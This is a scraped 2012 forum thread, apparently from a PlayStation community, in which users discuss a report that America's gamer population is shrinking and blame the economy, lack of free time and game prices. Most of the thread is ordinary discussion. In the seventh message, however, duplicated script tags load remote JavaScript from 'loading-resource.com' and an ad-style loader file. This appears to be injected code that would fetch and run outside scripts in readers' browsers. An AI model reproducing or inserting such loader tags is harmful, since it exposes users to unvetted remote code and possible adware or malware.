Sep 07 2012
By: dulun18 Big Daddy 18478 posts

America's gamer population is shrinking

13 replies 164 views Edited Sep 7, 2012

http://www.gamasutra.com/view/news/177176/Americas_gamer_population_is_shrinking.php

honestly i have no idea which area is correct to post this.. so decided to post it here instead..

What Are Internet TROLLS ?
To QUOTE- TOP RIGHT of the reply box - To MULTI-QUOTE
PSP and PS3 owner..YES...i still play the LAST GEN systems
****still waiting for The LAST GUARDIAN****
Image and video hosting by TinyPic
Message 1 of 14 (164 Views)
0 Likes
Fender Bender
2521 posts

Re: America's gamer population is shrinking

[ Edited ]
Sep 8, 2012

I totally agree with this comment:

"Here's my theory ... The economy took a crap a few years ago. People lost jobs and went home... They discovered they had more time for games. They "invested" in gaming because they needed something to fill their time. While the rest of the economy crapped out over the last few years, games grew.

2012. The economy is marginally better, but people are getting hired. Anyone home is tight on cash... "

I can relate to that.  Because in 2011 I started working again full-time and had less time for games.  With gas/food/rent/utilities prices so high now, I don't find $65 (tax included) a game worth it anymore.  So I'm more picky with my retail purchases.  But I have made more digital purchases lately because of the lower prices.

photo 4f9f1065-23b3-4875-a40d-e36af3b1f802.jpg
#I'd rather be hated for who I am than loved for what I'm not
Message 2 of 14 (147 Views)
0 Likes
Treasure Hunter
6586 posts

Sep 8, 2012

Actually, I find the gamer population is ever growing, some are weighing in at over 200 lbs! :smileyindifferent:

Don't be a Coconut.
Message 3 of 14 (129 Views)
Lombax Warrior
141 posts

Sep 8, 2012
Just because people cant buy as much games right? So they are still gamers at heart right? :smileyhappy: Also the developers and companys have to try and help. Maybe we can get $50 games back?
"Escape meeee, escape meeee!"
Message 4 of 14 (120 Views)
0 Likes
Hekseville Citizen
325 posts

Sep 9, 2012

I think between game sharing and buying used games and yes the economy sales of gaming have dropped but I don't think less people are gaming. It is like any other thing that cost money when people have It sales go up when they don't sales drop.

The pen is mightier than the sword

Message 5 of 14 (114 Views)
0 Likes
Big Daddy
18478 posts

Sep 18, 2012

NightRush wrote:

Actually, I find the gamer population is ever growing, some are weighing in at over 200 lbs! :smileyindifferent:

LOL :smileyhappy:

maybe they moved to the android/iphone market.. ??

Message 6 of 14 (91 Views)
0 Likes
Wastelander
766 posts

[ Edited ]
Sep 18, 2012

when i was 6th grade i used to game many hours everyday. i hit 7th grade got a gf did sports worked out and never gamed until sophomore year high school. currently a junior still working out and limit myself to about 3 hours a week. maybe some of the kids grew out of it, idk. though IRISH-PAT  has a great reason.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Message 7 of 14 (80 Views)
0 Likes
Fender Bender
2922 posts

Sep 20, 2012

dc4daniel wrote:

I totally agree with this comment:

I can relate to that.  Because in 2011 I started working again full-time and had less time for games.  With gas/food/rent/utilities prices so high now, I don't find $65 (tax included) a game worth it anymore.  So I'm more picky with my retail purchases.  But I have made more digital purchases lately because of the lower prices.

Same here, but instead of a full time job, I am a full time student. That really took a toll on my gaming. Finding a job is getting a bit more possible; therefore, having both a job and college is pretty much a stop to gaming. Yet, I consider myself a gamer, and don't plan on stopping being one.

Metallica Pinball Sig photo LONG-LIVE-PLAY-METALLICA-PINBALL_zps397a82cb.jpg
Gameplay -> http://www.youtube.com/watch?v=Gzxc59Y6GcA
Message 8 of 14 (61 Views)
0 Likes
Big Daddy
18478 posts

[ Edited ]
Sep 20, 2012

Viewtiful_Josh wrote:
Same here, but instead of a full time job, I am a full time student. That really took a toll on my gaming. Finding a job is getting a bit more possible; therefore, having both a job and college is pretty much a stop to gaming. Yet, I consider myself a gamer, and don't plan on stopping being one.

This pretty much will say it all for most people..   or at least for me it's true :smileyhappy:  LOL

I'm at the working age.. and all the games that i bought .... still in wrapper..  with the time i have i either work more or sleep..

11746_345874002144925_863250759_n.jpg

Message 9 of 14 (51 Views)
0 Likes
Lombax Warrior
196 posts

Sep 20, 2012

I think it is growing in truth but because people dont have as much money right now they are not buying like normal. Also in a bad economy I bet alot more people buy used also and those numbers are not tracked like the big AAA releases are.

Message 10 of 14 (48 Views)
0 Likes